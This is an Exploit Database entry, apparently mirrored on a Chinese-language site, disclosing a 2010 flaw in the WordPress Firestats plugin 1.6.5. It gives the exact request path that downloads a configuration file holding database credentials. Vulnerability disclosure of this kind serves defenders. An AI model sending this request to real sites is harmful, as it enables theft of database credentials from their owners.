WordPress Plugin Firestats – Remote Configuration File Download

• Exploit Database
• 9 阅读

• 作者： Jelmer de Hen
  日期： 2010-07-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14308/

• # Exploit Title: WordPress firestats remote configuration file download
  
  # Date: 2010-07-09
  # Author: Jelmer de Hen
  # Software Link: http://firestats.cc/
  # Version: 1.6.5
  # Tested on: PHP Do a simple GET request to this file:
  
  /wp-content/plugins/firestats/php/tools/get_config.php
  
  This will allow you to download a configuration file which contains the database username and password.
  		 	 		
  http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html